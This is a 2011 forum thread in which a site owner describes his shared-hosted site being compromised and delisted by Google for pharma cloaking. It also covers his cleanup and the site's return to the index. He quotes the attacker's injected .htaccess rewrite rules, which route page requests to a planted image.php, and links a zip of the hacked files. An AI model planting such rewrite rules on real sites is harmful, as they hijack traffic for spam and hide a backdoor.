Unoffical empeg BBS

Quick Links: Empeg FAQ | RioCar.Org | Hijack | BigDisk Builder | jEmplode | emphatic
Repairs: Repairs

Topic Options
#346564 - 23/07/2011 12:21 Site dropped from Google - due to server compromise
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
I dropped into my Google Analytics yesterday which I hadn't done in a long time - since May. To my surprise I found that search traffic to the site had dropped from about 30% of all visits to under 3%. An alarm bell went off immediately.

Along with this alarm bell I started thinking about my sales and how this could explain a shift in purchasing patterns I've been noticing. Meanwhile, I logged into Webmaster Tools to find two messages waiting for me letting me know that my site had been dropped from Google's index on June 6. Arrrgh!

They claim it's because my site was being used for cloaked content, and quite specifically pharma content. They list a bunch of the terms they claim came from a certain page on the site. They also list a bunch of search queries that supposedly were used to access the site, like "xanax," etc.

The problem is that NONE of this matches what's reported by Analytics. There it doesn't show any suspect keywords having brought visitors to my site ever. Not even a single keyword match for a single visit.

Now, what I don't doubt it that the files on my site were compromised at some point. On June 7 while uploading some pages to my site I discovered an anomaly which lead me to discover that a couple of files had been altered and a couple of files which did not belong on the site.

All HTML/PHP pages seemed to be intact and without illegal modification. There was an extra file sitting in my images folder and I believe my downloads folder. The HTACCESS file for the root had been changed and referenced these other folders.

A few days later I received a message from a vigilant customer who said he'd received spam at an address he had constructed specifically for my online store, three years ago. The address was in a database on my site. The database doesn't really contain any other information except a mailing record to track physical packages were sent. Anyway, more about that later or in another thread. Bottom line is this confirmed someone had been through the site in one way or another.

I re-upped all the pages from my local copy, changed absolutely all passwords remotely associated with the site and contacted Dreamhost customer support. They didn't find any unauthorized logins through any of my domains, which leads me to think someone came in via their servers after having compromised someone else's site on the shared host.

I'm kicking myself in the ass for not having noticed or checked immediately the Google stuff, since while they seem to send me emails 5 times per day about Apps transitions, they never send any about this kind of thing. Right now I'm trying to figure out how to consolidate some of my Google accounts so I can better manage email from them. Anyone know if I can transfer my Webmaster Tools ownership from one Google account to another?

I have to run right now so I'll be back a bit later with more info and some questions for Google and web security gurus...



Edited by hybrid8 (23/07/2011 19:15)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346565 - 23/07/2011 15:45 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Below is what was changed in my .htaccess file, denoted between the hashes (#######)

Code:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Options -Indexes
Options +FollowSymLinks

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.domain\.com$ [NC]
RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L]

###########

RewriteRule image.php - [L]
RewriteCond %{REQUEST_METHOD} (GET|POST)
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} !(login|auth|register|secure|admin|config.|style.|mod_php.|image.) [NC]
RewriteCond %{HTTP:servers}	!(true)
RewriteRule .*\.(pl|php|html|phtml|htm) /images/image.php [L,NC]

###########

ErrorDocument 404 /404.html
ErrorDocument 403 /404.html




The image.php file is fairly large with all text on one line without any breaks. Even if I hard wrap it, it's too long to post here easily. If anyone can help with looking at this file to give me an idea of what it does and especially how I can make sure that my site is protected for the future, I'm all ears and I can forward that file as an attachment or put it up somewhere for download zipped.


Edited by hybrid8 (23/07/2011 15:48)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346566 - 23/07/2011 15:54 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Ok, I found the pharma references. There were two fake jpg images in my images folder, both of them containing text. The first has portions of my site, links to my shop, etc. The second has all the pharma terms.

The files were named umenu2.jpg and mailto1.jpg

The compromised files were all dated May 28 2011.

I'm not sure what the purpose of these files were since their contents weren't visible to normal visitors. I continued to visit the site regularly during the affected week and no one reported seeing anything strange. Google claims the content was exposed to its search engines (only?)


Edited by hybrid8 (24/07/2011 11:29)
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346567 - 23/07/2011 17:17 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Interesting... Do a google search for

umenu2.jpg and mailto1.jpg

Lots of hacked sites at Dreamhost.. Oh Oh... Sending them info now.
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346570 - 23/07/2011 23:04 Re: Site dropped from Google [Re: hybrid8]
msaeger
carpal tunnel

Registered: 23/09/2000
Posts: 3608
Loc: Minnetonka, MN
Hope you don't lose too many sales while this is getting fixed.
_________________________

Matt

Top
#346572 - 24/07/2011 00:19 Re: Site dropped from Google [Re: msaeger]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Too late on the lost sales.. I know it's affected my sales, I just don't know by how much other than a rough estimate. But I think it's been significant.
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346574 - 24/07/2011 03:00 Re: Site dropped from Google [Re: hybrid8]
RobotCaleb
pooh-bah

Registered: 15/01/2002
Posts: 1866
Loc: Austin
Post it so someone can take a look at it when they get a chance.

Top
#346575 - 24/07/2011 11:33 Re: Site dropped from Google [Re: RobotCaleb]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Zip file with the hacked files here: http://mypocket.com/Hackedfiles.zip
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346576 - 24/07/2011 15:00 Re: Site dropped from Google [Re: hybrid8]
hybrid8
carpal tunnel

Registered: 12/11/2001
Posts: 7738
Loc: Toronto, CANADA
Site back in Google's index as of today. I don't know if it has anything to do with my request to re-add or if it was already previously scheduled to come back at this time. Whatever the case, PHEW!
_________________________
Bruno
Twisted Melon : Fine Mac OS Software

Top
#346668 - 01/08/2011 15:06 Re: Site dropped from Google [Re: hybrid8]
DWallach
carpal tunnel

Registered: 30/04/2000
Posts: 3810
To the extent that I can draw a conclusion about this, it's that running your own web site, much like running your own email server, is no longer fire-and-forget. Now you have to be continuously worrying about the latest security issue, installing patches regularly, etc., or you need to outsource to somebody else who will do it for you.

And, as it happens, I've got a bunch of web sites that prior grad students set up with WordPress that have been running largely on autopilot for years. I'm now trying to transition these to being "professionally" maintained by our university IT staff for precisely these reasons.

Top